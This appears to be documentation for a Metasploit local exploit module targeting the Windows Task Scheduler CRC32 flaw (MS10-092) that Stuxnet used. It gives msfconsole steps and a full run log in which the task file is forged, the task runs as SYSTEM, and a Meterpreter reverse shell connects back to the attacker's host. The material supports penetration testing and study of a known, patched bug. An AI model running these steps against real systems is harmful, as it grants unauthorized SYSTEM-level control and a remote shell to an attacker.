## Vulnerable Application

This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, in a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.

## Scenarios

## Verification Steps

1. Start msfconsole
2. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
3. Do: `set SESSION [#]`
4. Do: `run`

### A run on Windows Vista (Build 6000) and Kali Linux 2019.3

```
msf > use modules/exploits/windows/local/ms10_092_schelevator
msf exploit(windows/local/ms10_092_schelevator) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Preparing payload at C:\Users\test\AppData\Local\Temp\CItOOtB.exe
[*] Creating task: TzAZ6H4K
[*] SUCCESS: The scheduled task "TzAZ6H4K" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\TzAZ6H4K...
[*] Original CRC32: 0x69b1db25
[*] Final CRC32: 0x69b1db25
[*] Writing our modified content back...
[*] Validating task: TzAZ6H4K
[*]
[*] Folder: \
[*] TaskName                                 Next Run Time          Status
[*] ======================================== ==================== ===============
[*] TzAZ6H4K                                 12/1/2019 10:41:00 A Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (180291 bytes) to 192.168.1.2
[*] SUCCESS: Attempted to run the scheduled task "TzAZ6H4K".
[*] SCHELEVATOR
[*] Deleting the task...
[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.2:49249) at 2019-11-27 10:42:02 -0700
[*] SUCCESS: The scheduled task "TzAZ6H4K" was successfully deleted.
[*] SCHELEVATOR
```